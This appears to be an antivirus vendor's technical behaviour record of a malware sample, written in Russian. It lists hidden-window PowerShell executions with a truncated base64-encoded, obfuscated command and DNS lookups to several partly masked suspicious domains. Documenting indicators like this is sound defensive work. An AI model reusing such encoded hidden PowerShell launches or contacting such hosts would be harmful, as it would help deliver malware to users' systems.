Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABRAEEAVQBBAEEAQQBfAHcAPQAnAEcAQQBCAEcAYwBCAFUAWABjACcAOwAkAFQAVQBBAEEAQQB3AFgAQgBfACAAPQAgACcAMQA2AD...
- DNS ASK al#####imports.com.br
- DNS ASK or###rdim.com
- DNS ASK an###iclady.com
- DNS ASK qu###angs.com
- DNS ASK ad####atours.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABRAEEAVQBBAEEAQQBfAHcAPQAnAEcAQQBCAEcAYwBCAFUAWABjACcAOwAkAFQAVQBBAEEAQQB3AFgAQgBfACAAPQAgACcAMQA2AD...' (со скрытым окном)